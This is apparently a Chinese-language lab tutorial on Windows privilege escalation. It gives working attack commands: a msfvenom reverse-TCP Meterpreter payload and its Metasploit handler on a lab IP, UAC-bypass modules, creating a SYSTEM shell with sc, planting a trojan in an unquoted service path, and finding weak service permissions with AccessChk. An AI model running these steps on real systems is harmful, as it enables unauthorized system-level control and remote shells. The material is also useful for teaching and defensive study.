权限提升:

systeminfo看补丁

官网找漏洞:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/securitybulletins2017

payloads下载:https://github.com/SecWiki/windows-kernel-exploits

这里用巴西烤肉:

pr.exe

windows提权(下)_Windows

新建用户:

windows提权(下)_Windows_02

windows提权(下)_重启_03

UAC提权:

vista以后引入的安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。

当前获得的权限是存在于管理员组的时候但是并且是administrator这个用户,此时就可能需要我们进行绕过UAC的操作,否则虽然是管理员组但是实际上并没有管理员所对应的高权限操作,这个时候就需要bypass uac

msf提权:

新增windows10用户:

windows提权(下)_system权限_04

msf:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.146 LPORT=4444 -f exe -o payload.exe

下载:

windows提权(下)_重启_05

切换账号:

windows提权(下)_Windows_06

没有vmtools,用共享文件夹:

windows提权(下)_Windows_07

windows提权(下)_重启_08

windows提权(下)_system权限_09

windows提权(下)_重启_10

监听:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.31.146

set lport 4444

exploit

windows提权(下)_Windows_11

windows提权(下)_system权限_12

guid:查看当前权限:

windows提权(下)_重启_13

getsystem提权:

失败:

windows提权(下)_Windows_14

输入background

use exploit/windows/local/ask

set session 2

exploit

未成功。

windows提权(下)_system权限_15

除非管理员输入密码,建立新的会话

这两个模块:

use exploit/windows/local/bypassuac

use exploit/windows/local/bypassuac_injection

windows提权(下)_Windows_16

没戏,成功几率小

也可以关注:exploit/windows/local/ 这里都是提权的内容

windows提权(下)_重启_17

sc命令提权(administrator–>system):

sc命令类似于控制面板的服务,

sc Create syscmd binPath= “cmd /K start” type= own type= interact

windows提权(下)_Windows_18

sc start systcmd,就得到了一个system权限的cmd环境

不带引号的服务路径

当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例。

带空格的路径要带引号

错误的配置看这条命令:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """

windows提权(下)_重启_19

我们可以将msf的muma放到这个路径下下,然后重启机器,此时,反弹回来的shell,则是一个system的shell

一个叫program.exe,另一个叫Documents.exe。随便找个exe

重启一下:

windows提权(下)_重启_20

不安全的服务权限:

即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它。

windows提权(下)_重启_21

AccessChk工具可以用来查找用户可以修改的服务: accesschk.exe -uwcqv “Authenticated Users” * /accepteula accesschk.exe -uwcqv “user” * 也可以上传msf相关模块的muma